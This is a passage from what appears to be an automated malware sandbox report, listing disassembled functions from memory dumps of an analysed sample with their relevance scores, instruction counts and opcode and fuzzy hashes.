                            • Opcode Fuzzy Hash: b3b114c93e1d2334432b18a87c49435b43503abd167bc89224786e09aa93d98b
                            • Instruction Fuzzy Hash: CF519F70A403149FDB08DFB8D8587AE7BA6BF89700F208568E40A9B3A5DB319C55DB51
                            Function 05E71A8C Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: cb7bac98ad2c390d8ce48277930f61f95511dd398fa0afcca67817f5bee43f8a
                            • Instruction ID: 06bbdc4005a7842faee253966e5d24a072786f701b15ac4195964ece978b7411
                            • Opcode Fuzzy Hash: cb7bac98ad2c390d8ce48277930f61f95511dd398fa0afcca67817f5bee43f8a
                            • Instruction Fuzzy Hash: 3841779560E7D04FD3075734983469A7FB2AF87214B2A01DBD1C2CF6E3DA594C0AC7A6
                            Function 021212C5 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0qr
                            • API String ID: 0-3732162519
                            • Opcode ID: 9c0647b8f84bfb90f03784a25ff861ea4d73fdd7906a1200c166eca9b9b2aa91
                            • Instruction ID: 987029c18c97f458167a473ca35c3710f251b40338ed05831ec54574dfbb0618
                            • Opcode Fuzzy Hash: 9c0647b8f84bfb90f03784a25ff861ea4d73fdd7906a1200c166eca9b9b2aa91
                            • Instruction Fuzzy Hash: 42F028317913246FE71963695C167AE72436BC0B10F248064F60EEB2D5CF65AC135798
                            Function 02481F6A Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,02481E21,?,?), ref: 02481FC8
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515529331.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2480000_file.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 64745a62f415860080507844b13d5ceedb2e4fc487f4c5e78c2603662f83d636
                            • Instruction ID: 37ac2ea4e3d7869b6bcacd2552aef03925369338b2eb820baef9be49f61a8ba8
                            • Opcode Fuzzy Hash: 64745a62f415860080507844b13d5ceedb2e4fc487f4c5e78c2603662f83d636
                            • Instruction Fuzzy Hash: 591123B4800389CFCB10DFAAC444B9EBBF4AB48310F14845AD558A7740C778A984CBA5
                            Function 02123F79 Relevance: .6, Instructions: 590COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed6a2c1a8545da308dc071aefa9289c2806e91e1390da7af24349c6a76961a3a
                            • Instruction ID: 091589dc11e306346d3b48ed5ee27034ea5a4eeb75213f36cdf475be8a534920
                            • Opcode Fuzzy Hash: ed6a2c1a8545da308dc071aefa9289c2806e91e1390da7af24349c6a76961a3a
                            • Instruction Fuzzy Hash: E2327A30A402298FCB24CF69D984A9EBBF2BF89314F158559F859DB3A1D730EC55CB90
                            Function 05E7125A Relevance: .5, Instructions: 546COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 104634f63b91e43e44a7683582a413d078a37f83e361a9a37cde7b0fc86cfdd4
                            • Instruction ID: 0d613acdf7b7b906fe94b495bffd924bcaf4c57357e4838f75a47c3ad7537324
                            • Opcode Fuzzy Hash: 104634f63b91e43e44a7683582a413d078a37f83e361a9a37cde7b0fc86cfdd4
                            • Instruction Fuzzy Hash: A7127C70A10618CBC748FFB9D8D9A5DBBF6FB88204F808529E485E7354DE39AC05DB51
                            Function 05E7C1A0 Relevance: .5, Instructions: 526COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a05e90686c491edcaac140d7d093deab2b34c40a6933bbe88de04853b3f5e76d
                            • Instruction ID: f120576f582a19cff3116e839367f5db17271f4d27f6c0235ad3c8575f97e601
                            • Opcode Fuzzy Hash: a05e90686c491edcaac140d7d093deab2b34c40a6933bbe88de04853b3f5e76d
                            • Instruction Fuzzy Hash: 9D126074A10618CBCB14EFB9EA8969DBBF6FB88300F5048A9E549E3354DE356D44CB50
                            Function 05E71268 Relevance: .5, Instructions: 526COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eff8e10f0e75c854f614d7c4ffcf3a834a13f6d8822f38e1f25bfd9dac68b9a5
                            • Instruction ID: f02d56ad3bcbb039da25b75784ccbf41e8850b5348045f1b0e33a909e3c9c05b
                            • Opcode Fuzzy Hash: eff8e10f0e75c854f614d7c4ffcf3a834a13f6d8822f38e1f25bfd9dac68b9a5
                            • Instruction Fuzzy Hash: 99126B70A20618CBC748FBF9D8D9A6DBBF6FB88204F808529E485E7354DE39AC05D751
                            Function 05E71C20 Relevance: .5, Instructions: 494COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c53aa9c3e7404c3d8e59547e176fee6b92dffcde064f3303be0f4942a6364969
                            • Instruction ID: fbd552a23b64a14b6e2b1663604ce1fb3f203c1100042b943888fc9aa10fe678
                            • Opcode Fuzzy Hash: c53aa9c3e7404c3d8e59547e176fee6b92dffcde064f3303be0f4942a6364969
                            • Instruction Fuzzy Hash: D802AD74A24214CFC708EBB8D89496D7BE6FF89250B5185ADD44ADB360DF3AEC01CB91
                            Function 05E71C10 Relevance: .5, Instructions: 476COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be4a36b56fea375d34b9b6d56ae499a194350e1392185fe3aca361afda6018d9
                            • Instruction ID: bbb5adc3c551fbb742d2facab193253cc3f637f04729c7fd2f96b2595dc235bb
                            • Opcode Fuzzy Hash: be4a36b56fea375d34b9b6d56ae499a194350e1392185fe3aca361afda6018d9
                            • Instruction Fuzzy Hash: 98029D74B24214CFC708EBB9D89496D77E6BF89250B6085ADD44ADB360DF3AEC01CB91
                            Function 021245B8 Relevance: .5, Instructions: 461COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b493472136f112fd0849b03b07ac8bb63eb3b4d8ca73486e96277c202dc63565
                            • Instruction ID: 56d483aa9d16750bdc2647d7a9364a3a0e6f02d77c84cabc5bc0959089535b8c
                            • Opcode Fuzzy Hash: b493472136f112fd0849b03b07ac8bb63eb3b4d8ca73486e96277c202dc63565
                            • Instruction Fuzzy Hash: 8E124B35A40229CFCB24CF68D584BAEBBB2FF88314F168555F4159B395C734E8A5CB90
                            Function 021229A8 Relevance: .4, Instructions: 429COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8d362ef684a0ab586af2c8455b32161a91c63a8a7d132112455c17981c8e006
                            • Instruction ID: 5d857466dda771ba30c4adb86eed64e5e75a00bab047a4ece1e650ae7917e358
                            • Opcode Fuzzy Hash: f8d362ef684a0ab586af2c8455b32161a91c63a8a7d132112455c17981c8e006
                            • Instruction Fuzzy Hash: 7DE1A030B412249FDB199F74D858B7E77A6BB88321F248429F806CB291CF75CC69DB91
                            Function 05E7A608 Relevance: .4, Instructions: 413COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f04bfb4acc4f70c76987cac00f3b6bf82f42bf65bc3bb587cf2734a71aeb8a1
                            • Instruction ID: 98b6c4d0bc1296a9b9c91ac4bbfc216823a39d07d1258f37cf50604657c88f58
                            • Opcode Fuzzy Hash: 0f04bfb4acc4f70c76987cac00f3b6bf82f42bf65bc3bb587cf2734a71aeb8a1
                            • Instruction Fuzzy Hash: C3E1D330A14205CBC708FBB9E99A62EBBF6FF84201F458579E485E3394DE39AC45C791
                            Function 05E70A38 Relevance: .4, Instructions: 401COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b1328a04fca9c1744648d7c827cb1a24baabe180833074ff26ba1e840188502
                            • Instruction ID: 6c1d87513fda94e574cd1382c4a0f33254a65d13998e33b1918a8eb67bb8f67d
                            • Opcode Fuzzy Hash: 8b1328a04fca9c1744648d7c827cb1a24baabe180833074ff26ba1e840188502
                            • Instruction Fuzzy Hash: 4ED11170A14208CFC709FBB9D8996AEBBB6FFC8210F55846DE085E3394DE345C4987A1
                            Function 05E7B340 Relevance: .4, Instructions: 379COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c16e72ac326f927df641d46548363e75d03138421f4c153c943cd2e9157eecc
                            • Instruction ID: 9ca145cb515ef503931e3f0d3bfc50c035d1aeffc413243f36f6a0d75f3e98dd
                            • Opcode Fuzzy Hash: 4c16e72ac326f927df641d46548363e75d03138421f4c153c943cd2e9157eecc
                            • Instruction Fuzzy Hash: 78D1C130A14604CFC344FBB9D99961EBBEAFB88214F41C96CE485D7354EE39AC05C791
                            Function 0212B088 Relevance: .3, Instructions: 330COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 667f94057d81b84cb90f88e6749268290188ffdf88375d888047a549723cb52f
                            • Instruction ID: 8b9a0aef3eab3ae1e3e0447649db064f3533fcb4da55b6c748f59a06032fc64a
                            • Opcode Fuzzy Hash: 667f94057d81b84cb90f88e6749268290188ffdf88375d888047a549723cb52f
                            • Instruction Fuzzy Hash: AEB1C230E14206CBC714EBF9D9C5B2EB7BAFB88204F914468E045E3354DE3A6D55C3A2
                            Function 02124DFF Relevance: .3, Instructions: 314COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa21cbd3e033d49a8fdf1914730f59cab92bdf3fa94758367a7c067c26fc3fbf
                            • Instruction ID: 28ff58b692e1d86cb499df2a19109047ad14fc36945a86ba566b1cedd79819d4
                            • Opcode Fuzzy Hash: fa21cbd3e033d49a8fdf1914730f59cab92bdf3fa94758367a7c067c26fc3fbf
                            • Instruction Fuzzy Hash: C8D14975A412249FCB09CFA8C884AADBBF2BF88314F568099F415AB361D734EC55CF94
                            Function 021230E0 Relevance: .3, Instructions: 289COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 60d5ce5251ed1a9dbcf788e064bba0e790fb0a2258c45e7875d4646eb29fc74d
                            • Instruction ID: 8154cc488b1c3cd1747239ce9c15492587b18f8e3c7fd8753b04801665b4842c
                            • Opcode Fuzzy Hash: 60d5ce5251ed1a9dbcf788e064bba0e790fb0a2258c45e7875d4646eb29fc74d
                            • Instruction Fuzzy Hash: 32B1E334B40265CFCB18CF69C884A69B7B1FF89314B1581EAE425EB361DB35DC59CB50
                            Function 05E7DFB0 Relevance: .3, Instructions: 287COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecc49196daf71ad2e3ce1b84e76c16de37381e66cd921aed4560446d7f252f25
                            • Instruction ID: d7ca167ba8aece2a3946513269e6b06ae47dfa50cb2739865f9acb8746567f43
                            • Opcode Fuzzy Hash: ecc49196daf71ad2e3ce1b84e76c16de37381e66cd921aed4560446d7f252f25
                            • Instruction Fuzzy Hash: BAA1C430B14206DFC704EBFAD995A6E7BFAFF88200F418569E445D7354EE39AC468B90
                            Function 05E70040 Relevance: .3, Instructions: 272COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1a094be335aa18567dfa94968f999e4dd1adfc206e6bd9d98706527df10d817
                            • Instruction ID: 49545de3b421d96941b52df0a53563a2678c88b748d7206019ffd45517bdba51
                            • Opcode Fuzzy Hash: c1a094be335aa18567dfa94968f999e4dd1adfc206e6bd9d98706527df10d817
                            • Instruction Fuzzy Hash: 17C16C75E0060A9FCB14DF68C4909AEF7B2FF88320B259259D955AB355DB30FC82CB90
                            Function 05E7CFEA Relevance: .3, Instructions: 270COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 41b51f25d32dc70a17ffd9d7f4207fb2bce8bd35149df388dab9c2d92f7000e5
                            • Instruction ID: 33ef24b2108612c29face6a16108cb812f52f59eb6266a3dbadd936b8c3eabd2
                            • Opcode Fuzzy Hash: 41b51f25d32dc70a17ffd9d7f4207fb2bce8bd35149df388dab9c2d92f7000e5
                            • Instruction Fuzzy Hash: 1F91C331A1C385CFC706BBB8DD9566D7FB1EF86200F4644AAD4C1D72A2DE395849C3A2
                            Function 05E70006 Relevance: .3, Instructions: 269COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71be645cb92255315dd32a175375c4b16c817eccb7d3b5cc1654ee90dfd5356b
                            • Instruction ID: 05fa3d58b806c830e8b7561d8c3170c06b180d94161d1a20ef1ec05306bfccb2
                            • Opcode Fuzzy Hash: 71be645cb92255315dd32a175375c4b16c817eccb7d3b5cc1654ee90dfd5356b
                            • Instruction Fuzzy Hash: B8C13075E0060A9FCB15DF68D4949AEF7B2FF88310B269255D941AB356DB30FC82CB90
                            Function 0212A3D0 Relevance: .3, Instructions: 268COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7866ff554e12d6f6c872219c1c2acddfcf991ea22a123531942814952ca023b9
                            • Instruction ID: f3630d53d780c48c8d83f7fcdcc0999e769ae22324baa48ffd768116c66aeb36
                            • Opcode Fuzzy Hash: 7866ff554e12d6f6c872219c1c2acddfcf991ea22a123531942814952ca023b9
                            • Instruction Fuzzy Hash: 8541E3712402A49FDB159F64D818BAF7BE6FFC9310F094859FC469B250DB34D829CBA1
                            Function 05E70458 Relevance: .3, Instructions: 253COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58e42eef353265ff74c4d3d44113cc8e9bc11a649373d812244d185db1e54954
                            • Instruction ID: 396dcd54758c0383f596b388e2497a7f749f16825ec8af1693278c6248b22fb6
                            • Opcode Fuzzy Hash: 58e42eef353265ff74c4d3d44113cc8e9bc11a649373d812244d185db1e54954
                            • Instruction Fuzzy Hash: 7BA19DB1A00348DFDB15DFA9C45879DFBB2FF89310F24815AD449AB250DB709985CF51
                            Function 02126C80 Relevance: .2, Instructions: 220COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac7d3243cdc12f8fc86b3e5709ee196ec414ff98c54c667ceef17a705b5b3f67
                            • Instruction ID: d5dc1c1201fc2f246be69eb6cfc8dfe6b529dbf9c92cf469efee5181b162ab10
                            • Opcode Fuzzy Hash: ac7d3243cdc12f8fc86b3e5709ee196ec414ff98c54c667ceef17a705b5b3f67
                            • Instruction Fuzzy Hash: B981E034A443959FDB068F75D454AAEBFB2AF8A310F1840E9F841DB392DB319C5ACB50
                            Function 02126F11 Relevance: .2, Instructions: 204COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe42771cbbf911a697fc670e715628ef554294fe6b4a7fdc64b7485e021b8e24
                            • Instruction ID: 4e99412dfeeced160ae1723d0651b249fa44a8f8c1ea5645644bc5aee043bc57
                            • Opcode Fuzzy Hash: fe42771cbbf911a697fc670e715628ef554294fe6b4a7fdc64b7485e021b8e24
                            • Instruction Fuzzy Hash: E971C034A403659FDB098F75D4547AEBBB6AF8A310F1841A9F841DB3E1DB30D85ACB50
                            Function 0212707B Relevance: .2, Instructions: 200COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3085d7c542e1612f7591c8fd01d92811fbcbe356aea8cd3cfbd674d5fd887adf
                            • Instruction ID: a9b1f00f975e2cae152cf935b054467b17838bce3356732087868f480ca0a631
                            • Opcode Fuzzy Hash: 3085d7c542e1612f7591c8fd01d92811fbcbe356aea8cd3cfbd674d5fd887adf
                            • Instruction Fuzzy Hash: 9C71C030A442559FDB099B74E4546AEBFB2BF8A310F1840A9E841DB3A5DB34CD5ACB50
                            Function 021270EE Relevance: .2, Instructions: 199COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 30337b8b323fa234bca83a635fa28ee72d58ebb4dab89788844ceb7e49186718
                            • Instruction ID: 9e59778884747f95089294e454b7e4df9d23dadc1c95d2a1d920e5e84b404c0d
                            • Opcode Fuzzy Hash: 30337b8b323fa234bca83a635fa28ee72d58ebb4dab89788844ceb7e49186718
                            • Instruction Fuzzy Hash: 6171EF34A442559FDB099F75D4946AEBFB2BF8A310F1840A8F841DB3A1DB30CC5ACB50
                            Function 05E7DD25 Relevance: .2, Instructions: 191COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 25aae5477d3c0959cecb4efa732873793f03849f39486e0042e743e2bdffe16f
                            • Instruction ID: 2d228b91ffb9370b9c2a51a6bff5331f06cca9dfc59fab8c3f01681960e0ea5d
                            • Opcode Fuzzy Hash: 25aae5477d3c0959cecb4efa732873793f03849f39486e0042e743e2bdffe16f
                            • Instruction Fuzzy Hash: 5D511130A14215CFC705FBB9D985A6EBFF2EF89210F4485AAD485E3395DE39AC05C3A1
                            Function 02126E17 Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48fa2c2867417214507d5ff746848b3cba86da3ff0ab3f1f7c77dc67165440d1
                            • Instruction ID: c9ec0868ae4c4cfe0d57b89791752af0ae7e1720864c85004c02d174cf72c916
                            • Opcode Fuzzy Hash: 48fa2c2867417214507d5ff746848b3cba86da3ff0ab3f1f7c77dc67165440d1
                            • Instruction Fuzzy Hash: AA61DF34A403559FDB098F75D454AAEBBB2BF8A310F2840A9F841DB3A1DB34CC4ACB50
                            Function 02126E6B Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 943890d405d78782dd7b79e91223d08d2f71b88735535cf97137a56fbd5dc931
                            • Instruction ID: c9688911f94c5c68d95c84ff805b9ad5b7e29affa6926c5874bf95311ba91f19
                            • Opcode Fuzzy Hash: 943890d405d78782dd7b79e91223d08d2f71b88735535cf97137a56fbd5dc931
                            • Instruction Fuzzy Hash: 8861A034A443559FDB098F75D4946AEBBB2BF8A310F2840A9F841DB3A1DB34DC56CB50
                            Function 02126DC3 Relevance: .2, Instructions: 190COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e7649200164625f632057aa12855aeb121dc51c7428feaf1d3950e5305d4aa6
                            • Instruction ID: 1144e4e332885cddf026e4d1486c90225d51130df33c16a7281b700b2aaf383a
                            • Opcode Fuzzy Hash: 6e7649200164625f632057aa12855aeb121dc51c7428feaf1d3950e5305d4aa6
                            • Instruction Fuzzy Hash: ED61CE34A442559FDB098F75D494AAEBBB2BF8A310F1840A9F841DB3A1DB34DC56CB50
                            Function 02126FDF Relevance: .2, Instructions: 179COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 855a122f1cfaa23700f5c6421305268f35442528491eec5ad2564121935bc8ba
                            • Instruction ID: ac3e9d92836671ef6ec0fdd88acb139c81073bba510a1b1a454b7aa989eb88a1
                            • Opcode Fuzzy Hash: 855a122f1cfaa23700f5c6421305268f35442528491eec5ad2564121935bc8ba
                            • Instruction Fuzzy Hash: 2461AF34A402559FDB098F75D494AAEBBB2BF8A310F1840A8F845DB3A1DB34DD56CB50
                            Function 02126EF6 Relevance: .2, Instructions: 175COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8da3d4f5e3cfcd34931d7c4f93318f8b6837202e91897cef6ff3bc917b18a484
                            • Instruction ID: a123d1226db963aff1a1b54c754cf173a933a76887525e6cf9921db7955cda48
                            • Opcode Fuzzy Hash: 8da3d4f5e3cfcd34931d7c4f93318f8b6837202e91897cef6ff3bc917b18a484
                            • Instruction Fuzzy Hash: 9151B034A402559FDB098F75D494AAEBBF2BF8A310F1840A8F841DB3A2DB34DD46CB50
                            Function 02126D6A Relevance: .2, Instructions: 175COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f230d7008260db8c2ca1cef9219af295563591d3ac2ec85fc078491f1bb4b785
                            • Instruction ID: c808fc57f122c5c626157f0b98a38083681a13eb5fe008607d68b5bdcd1bc66d
                            • Opcode Fuzzy Hash: f230d7008260db8c2ca1cef9219af295563591d3ac2ec85fc078491f1bb4b785
                            • Instruction Fuzzy Hash: 0F51B034A402559FDB058F75E494AAEBBF2BF8A310F1840A8F841DB3A2DB34DD46CB50
                            Function 05E7DD60 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
